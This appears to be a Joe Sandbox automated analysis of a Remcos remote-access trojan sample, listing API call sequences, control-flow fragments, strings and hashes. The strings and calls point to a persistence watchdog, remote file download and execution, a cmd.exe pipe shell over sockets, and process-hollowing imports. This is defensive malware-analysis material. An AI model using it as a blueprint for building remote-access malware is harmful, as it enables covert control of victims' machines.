46596 411140 38 API calls ___scrt_fastfail 46097->46596 46099 40dc39 CreateThread 46099->46069 46598 401bc9 49 API calls 46099->46598 46100 40dc8b 46336 40b0a3 7 API calls 46100->46336 46103 432739 46102->46103 46103->45838 46104 44091f 46103->46104 46602 44069c 46104->46602 46107->45820 46108->45824 46109->45827 46110->45833 46111->45840 46112->45826 46113->45846 46114->45848 46119 44cd48 46115->46119 46118 436cfa 8 API calls 3 library calls 46118->45853 46122 44cd65 46119->46122 46123 44cd61 46119->46123 46121 432372 46121->45851 46121->46118 46122->46123 46125 4475a6 46122->46125 46137 432d4b 46123->46137 46126 4475b2 CallCatchBlock 46125->46126 46144 442d9a EnterCriticalSection 46126->46144 46128 4475b9 46145 44d363 46128->46145 46130 4475c8 46131 4475d7 46130->46131 46156 44743a 23 API calls 46130->46156 46158 4475f3 LeaveCriticalSection std::_Lockit::~_Lockit 46131->46158 46134 4475e8 CallCatchBlock 46134->46122 46135 4475d2 46157 4474f0 GetStdHandle GetFileType 46135->46157 46138 432d56 IsProcessorFeaturePresent 46137->46138 46139 432d54 46137->46139 46141 432d98 46138->46141 46139->46121 46180 432d5c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 46141->46180 46143 432e7b 46143->46121 46144->46128 46146 44d36f CallCatchBlock 46145->46146 46147 44d393 46146->46147 46148 44d37c 46146->46148 46159 442d9a EnterCriticalSection 46147->46159 46167 43ad91 20 API calls __dosmaperr 46148->46167 46151 44d3cb 46168 44d3f2 LeaveCriticalSection std::_Lockit::~_Lockit 46151->46168 46152 44d381 _Atexit CallCatchBlock 46152->46130 46153 44d39f 46153->46151 46160 44d2b4 46153->46160 46156->46135 46157->46131 46158->46134 46159->46153 46169 443005 46160->46169 46162 44d2d3 46177 443c92 20 API calls __dosmaperr 46162->46177 46164 44d2c6 46164->46162 46176 445fb3 11 API calls 2 library calls 46164->46176 46165 44d325 46165->46153 46167->46152 46168->46152 46174 443012 ___crtLCMapStringA 46169->46174 46170 443052 46179 43ad91 20 API calls 

                                Control-flow Graph

                                APIs
                                • LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A8EF
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A8F8
                                • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A90F
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A912
                                • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A924
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A927
                                • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A93D
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A940
                                • GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D40C), ref: 0041A951
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A954
                                • GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040D40C), ref: 0041A969
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A96C
                                • LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040D40C), ref: 0041A97D
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A980
                                • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040D40C), ref: 0041A98C
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A98F
                                • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D40C), ref: 0041A9A1
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A9A4
                                • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D40C), ref: 0041A9B1
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A9B4
                                • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D40C), ref: 0041A9C5
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A9C8
                                • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D40C), ref: 0041A9D5
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A9D8
                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D40C), ref: 0041A9EA
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A9ED
                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D40C), ref: 0041A9FA
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A9FD
                                • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D40C), ref: 0041AA0A
                                • GetProcAddress.KERNEL32(00000000), ref: 0041AA0D
                                • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,?,?,?,0040D40C), ref: 0041AA1F
                                • GetProcAddress.KERNEL32(00000000), ref: 0041AA22
                                • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,0040D40C), ref: 0041AA30
                                • GetProcAddress.KERNEL32(00000000), ref: 0041AA33
                                • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow,?,?,?,?,0040D40C), ref: 0041AA40
                                • GetProcAddress.KERNEL32(00000000), ref: 0041AA43
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$HandleModule$LibraryLoad
                                • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GetSystemTimes$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtUnmapViewOfSection$Psapi.dll$SetProcessDEPPolicy$SetProcessDpiAware$SetProcessDpiAwareness$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll.dll$shcore$user32
                                • API String ID: 551388010-2474455403
                                • Opcode ID: e80cee8c84c8c84204283680f0404711a146afcd0be7a07adf6e8d3a182e926f
                                • Instruction ID: 1e7ebd14e1f9a52016720e07cc743ec1e909bc11fdf6f09267ddb838bd68d733
                                • Opcode Fuzzy Hash: e80cee8c84c8c84204283680f0404711a146afcd0be7a07adf6e8d3a182e926f
                                • Instruction Fuzzy Hash: 9031EBF0E413587ADB207BBA5C09E5B3E9CDA80794711052BB408D3661FAFC9C448E6E

                                Control-flow Graph

                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002,00000000), ref: 004407D6
                                • TerminateProcess.KERNEL32(00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002,00000000), ref: 004407DD
                                • ExitProcess.KERNEL32 ref: 004407EF
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CurrentExitTerminate
                                • String ID:
                                • API String ID: 1703294689-0
                                • Opcode ID: ab47e799b5bc4cc6dde358da0dc0a23fd4678ab9e3bf0635ceb4545ab71368f2
                                • Instruction ID: 8c86c1f28e0fd2f6406888839527a8aea1509f7e03a0ffdd8510570f14deced8
                                • Opcode Fuzzy Hash: ab47e799b5bc4cc6dde358da0dc0a23fd4678ab9e3bf0635ceb4545ab71368f2
                                • Instruction Fuzzy Hash: 9AE04631000608ABEF017F20DD48A493B29EB40346F410029F9088B232CB3DED52CA89

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 0041A8DA: LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A8EF
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A8F8
                                  • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A90F
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A912
                                  • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A924
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A927
                                  • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A93D
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A940
                                  • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D40C), ref: 0041A951
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A954
                                  • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040D40C), ref: 0041A969
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A96C
                                  • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040D40C), ref: 0041A97D
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A980
                                  • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040D40C), ref: 0041A98C
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A98F
                                  • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D40C), ref: 0041A9A1
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9A4
                                  • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D40C), ref: 0041A9B1
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9B4
                                  • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D40C), ref: 0041A9C5
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9C8
                                  • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D40C), ref: 0041A9D5
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9D8
                                  • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D40C), ref: 0041A9EA
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9ED
                                  • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D40C), ref: 0041A9FA
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9FD
                                • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 0040D603
                                  • Part of subcall function 0040F98D: __EH_prolog.LIBCMT ref: 0040F992
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$HandleModule$LibraryLoad$H_prologMutexOpen
                                • String ID: (#G$0"G$0"G$0"G$Access Level: $Administrator$Exe$H"G$H"G$Inj$Remcos Agent initialized$Software\$User$`"G$exepath$licence$license_code.txt$origmsc$!G$!G$!G$!G$!G
                                • API String ID: 1529173511-1365410817
                                • Opcode ID: faed5817389e9e1c44c9bd25bc2e5785f6855519673eedd1caaf3ae8bfa0178d
                                • Instruction ID: a36e185f3bd9362bdba41541190492353975b392bf08c7d21c2bc217d0697d36
                                • Opcode Fuzzy Hash: faed5817389e9e1c44c9bd25bc2e5785f6855519673eedd1caaf3ae8bfa0178d
                                • Instruction Fuzzy Hash: 5622B960B043412BDA1577B69C67A7E25998F81708F04483FF946BB2E3EEBC4D05839E

                                Control-flow Graph

                                APIs
                                • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00471E90,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E18
                                • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E23
                                • CloseHandle.KERNELBASE(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E2C
                                • closesocket.WS2_32(?), ref: 00404E3A
                                • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E71
                                • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E82
                                • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E89
                                • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E9A
                                • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E9F
                                • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404EA4
                                • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404EB1
                                • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404EB6
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                • String ID:
                                • API String ID: 3658366068-0
                                • Opcode ID: b1c96c5231e2cfca5084612c4e73afdaef55ac4315f506c78c7bb7997b29a698
                                • Instruction ID: b890c501aeabc943cf782ca315c2c368517b908ebe77e8074f52597b82095e9a
                                • Opcode Fuzzy Hash: b1c96c5231e2cfca5084612c4e73afdaef55ac4315f506c78c7bb7997b29a698
                                • Instruction Fuzzy Hash: 1B212C71000B009FDB216B26DC49B17BBE5FF40326F114A2DE2E212AF1CB79E851DB58

                                Control-flow Graph

                                APIs
                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00445A3C,?,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue), ref: 00445AC7
                                • GetLastError.KERNEL32(?,00445A3C,?,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue,0045C110,0045C118,00000000,00000364,?,004457F7), ref: 00445AD3
                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00445A3C,?,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue,0045C110,0045C118,00000000), ref: 00445AE1
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoad$ErrorLast
                                • String ID:
                                • API String ID: 3177248105-0
                                • Opcode ID: 6ca79951660ad3b6e96c8c42d18b75cc874aa2905662dd76989ddfa9726cc4c5
                                • Instruction ID: dabcc1aa4f00c9d7d6140ee010913d89a9079070269616da1364236c98588597
                                • Opcode Fuzzy Hash: 6ca79951660ad3b6e96c8c42d18b75cc874aa2905662dd76989ddfa9726cc4c5
                                • Instruction Fuzzy Hash: 8501FC32601B276BDF218A78AC84D577758EF05B617110635F906E3242D724DC01C6E8

                                Control-flow Graph

                                APIs
                                • GetProcAddress.KERNEL32(00000000,?), ref: 00445A59
                                • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00445A66
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc__crt_fast_encode_pointer
                                • String ID:
                                • API String ID: 2279764990-0
                                • Opcode ID: c61b452eecc00867d96f211e5a9c10d9e28e8afd79249807e8935c7f12eaf234
                                • Instruction ID: f797c493580bcbb57e031b514bcf368a6941c3076375826e2c1e25af396318bd
                                • Opcode Fuzzy Hash: c61b452eecc00867d96f211e5a9c10d9e28e8afd79249807e8935c7f12eaf234
                                • Instruction Fuzzy Hash: AA113A37A009319BAF21DE69ECC086B7391AB847247164332FC15BB346E634EC0286E9

                                 Control-flow Graph (rendered graph omitted; legend: Executed / Not Executed)
                                 control_flow_graph 478 40163e-401644 479 401646-401648 478->479 480 401649-401654 478->480 481 401656 480->481 482 40165b-401665 480->482 481->482 483 401667-40166d 482->483 484 401688-401689 call 43229f 482->484 483->484 485 40166f-401674 483->485 488 40168e-40168f 484->488 485->481 487 401676-401686 call 43229f 485->487 490 401691-401693 487->490 488->490
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f210c679e2b780eded3ea4ef50917041f60fa4d2abe52b8749c2b449606446f0
                                • Instruction ID: 17b6f17919427e724365abd55f1db4a6b8769e1fa76fb76fe63095c9ff18be87
                                • Opcode Fuzzy Hash: f210c679e2b780eded3ea4ef50917041f60fa4d2abe52b8749c2b449606446f0
                                • Instruction Fuzzy Hash: 09F0ECB02042015BCB1C9B34CD5062B379A4BA8365F289F7FF02BD61E0C73AC895860D

                                 Control-flow Graph (rendered graph omitted; legend: Executed / Not Executed)
                                 control_flow_graph 492 44d2b4-44d2c1 call 443005 494 44d2c6-44d2d1 492->494 495 44d2d7-44d2df 494->495 496 44d2d3-44d2d5 494->496 497 44d31f-44d32d call 443c92 495->497 498 44d2e1-44d2e5 495->498 496->497 500 44d2e7-44d319 call 445fb3 498->500 504 44d31b-44d31e 500->504 504->497
                                APIs
                                  • Part of subcall function 00443005: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004457DA,00000001,00000364,?,00000000,?,00439A11,00000000,?,?,00439A95,00000000), ref: 00443046
                                • _free.LIBCMT ref: 0044D320
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeap_free
                                • String ID:
                                • API String ID: 614378929-0
                                • Opcode ID: 3263e86e01d89d9b2c949f26067d012f8e3513974416179447fc4125dbbefc63
                                • Instruction ID: 6435cefd8bbe106a332e767b8e47ea9a619cae55f612b2c95de9f127ac4edb1d
                                • Opcode Fuzzy Hash: 3263e86e01d89d9b2c949f26067d012f8e3513974416179447fc4125dbbefc63
                                • Instruction Fuzzy Hash: 260149736003056BF321CF69D885E5AFBE8FB89374F25061EE585832C0EA34A905C738

                                 Control-flow Graph (rendered graph omitted; legend: Executed / Not Executed)
                                 control_flow_graph 505 443005-443010 506 443012-44301c 505->506 507 44301e-443024 505->507 506->507 508 443052-44305d call 43ad91 506->508 509 443026-443027 507->509 510 44303d-44304e RtlAllocateHeap 507->510 515 44305f-443061 508->515 509->510 511 443050 510->511 512 443029-443030 call 442a57 510->512 511->515 512->508 518 443032-44303b call 440480 512->518 518->508 518->510
                                APIs
                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004457DA,00000001,00000364,?,00000000,?,00439A11,00000000,?,?,00439A95,00000000), ref: 00443046
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: 8a82d2413be822b6e30d7260cb8c0ab5a5cb0f0d071671a377993aa538de489b
                                • Instruction ID: 6f1ff5b5ffdcc79539d97ae047dfd157567b1d653d04e58146e0509186e3fe0c
                                • Opcode Fuzzy Hash: 8a82d2413be822b6e30d7260cb8c0ab5a5cb0f0d071671a377993aa538de489b
                                • Instruction Fuzzy Hash: A0F0B43220022466FB319E229C01A5B3749AF42FA2F158227BC04E62C9CA78DE1182AD

                                 Control-flow Graph (rendered graph omitted; legend: Executed / Not Executed)
                                 control_flow_graph 521 443649-443655 522 443687-443692 call 43ad91 521->522 523 443657-443659 521->523 531 443694-443696 522->531 525 443672-443683 RtlAllocateHeap 523->525 526 44365b-44365c 523->526 527 443685 525->527 528 44365e-443665 call 442a57 525->528 526->525 527->531 528->522 533 443667-443670 call 440480 528->533 533->522 533->525
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: 0c61ffa0ec78c269e0422769366e0108c3b164e239eff4ad14a217a7d57edf52
                                • Instruction ID: 99ef05a6bb91785527f59a1062444bc3c705daae6acf277761014d7f2c467fed
                                • Opcode Fuzzy Hash: 0c61ffa0ec78c269e0422769366e0108c3b164e239eff4ad14a217a7d57edf52
                                • Instruction Fuzzy Hash: 7EE0E52110162377F6312E635C0075B36489F41BA2F17412BFC8596780CB69CE0041AD
                                APIs
                                • GetCurrentProcessId.KERNEL32 ref: 00410B6B
                                  • Part of subcall function 00412268: RegCreateKeyA.ADVAPI32(80000001,00000000,P0F), ref: 00412276
                                  • Part of subcall function 00412268: RegSetValueExA.ADVAPI32(P0F,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 00412291
                                  • Part of subcall function 00412268: RegCloseKey.ADVAPI32(?,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 0041229C
                                • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410BAB
                                • CloseHandle.KERNEL32(00000000), ref: 00410BBA
                                • CreateThread.KERNEL32(00000000,00000000,00411253,00000000,00000000,00000000), ref: 00410C10
                                • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00410E7F
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                • String ID: (#G$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$!G
                                • API String ID: 3018269243-1736093966
                                • Opcode ID: 0994219a8e8a2e6fdacb02da6b6c9aac93029fb7835260760d01e793a2ba6ee3
                                • Instruction ID: e4f63523a9081b51a3adb9d06d528b7104d503695ba60a117a14e5ebfa22ea95
                                • Opcode Fuzzy Hash: 0994219a8e8a2e6fdacb02da6b6c9aac93029fb7835260760d01e793a2ba6ee3
                                • Instruction Fuzzy Hash: DD71923160430167C604FB62DD67DAE73A8AE91308F50097FF546621E2EEBC9E49C69F
                                APIs
                                • SetEvent.KERNEL32(?,?), ref: 00406D4A
                                • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00406E18
                                • DeleteFileW.KERNEL32(00000000), ref: 00406E3A
                                  • Part of subcall function 0041A01B: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00471E78,?), ref: 0041A076
                                  • Part of subcall function 0041A01B: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00471E78,?), ref: 0041A0A6
                                  • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00471E78,?), ref: 0041A0FB
                                  • Part of subcall function 0041A01B: FindClose.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A15C
                                  • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A163
                                  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                  • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                  • Part of subcall function 00404A81: WaitForSingleObject.KERNEL32(?,00000000,00401A25,?,?,00000004,?,?,00000004,00473A38,00471E78,00000000), ref: 00404B27
                                  • Part of subcall function 00404A81: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00473A38,00471E78,00000000,?,?,?,?,?,00401A25), ref: 00404B55
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407228
                                • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00407309
                                • DeleteFileA.KERNEL32(?), ref: 0040768E
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Find$DeleteDirectoryEventRemove$AttributesCloseDriveExecuteFirstLocalLogicalNextObjectShellSingleStringsTimeWaitsend
                                • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$open
                                • API String ID: 1385304114-1507758755
                                • Opcode ID: cb2d756319963123cdc946bd025587b190db48c268333e126865797fa68f4cfa
                                • Instruction ID: 48d75f04ed6415a86b5419c4bbb4b80b443badeb9edbc79095c7941e671ccbd4
                                • Opcode Fuzzy Hash: cb2d756319963123cdc946bd025587b190db48c268333e126865797fa68f4cfa
                                • Instruction Fuzzy Hash: EE42A771A043005BC604FB76C86B9AE77A9AF91304F40493FF542671E2EE7D9A09C79B
                                APIs
                                • __Init_thread_footer.LIBCMT ref: 004056C6
                                  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                • __Init_thread_footer.LIBCMT ref: 00405703
                                • CreatePipe.KERNEL32(00473BB4,00473B9C,00473AC0,00000000,00463068,00000000), ref: 00405796
                                • CreatePipe.KERNEL32(00473BA0,00473BBC,00473AC0,00000000), ref: 004057AC
                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00473AD0,00473BA4), ref: 0040581F
                                • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405877
                                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040589C
                                • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058C9
                                  • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                                • WriteFile.KERNEL32(00000000,00000000,?,00000000,00471F28,0046306C,00000062,00463050), ref: 004059C4
                                • Sleep.KERNEL32(00000064,00000062,00463050), ref: 004059DE
                                • TerminateProcess.KERNEL32(00000000), ref: 004059F7
                                • CloseHandle.KERNEL32 ref: 00405A03
                                • CloseHandle.KERNEL32 ref: 00405A0B
                                • CloseHandle.KERNEL32 ref: 00405A1D
                                • CloseHandle.KERNEL32 ref: 00405A25
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                • String ID: SystemDrive$cmd.exe
                                • API String ID: 2994406822-3633465311
                                • Opcode ID: 45804b196eb615b74f37731f9156c820bde623197d48a39944e1cd78d62eaab2
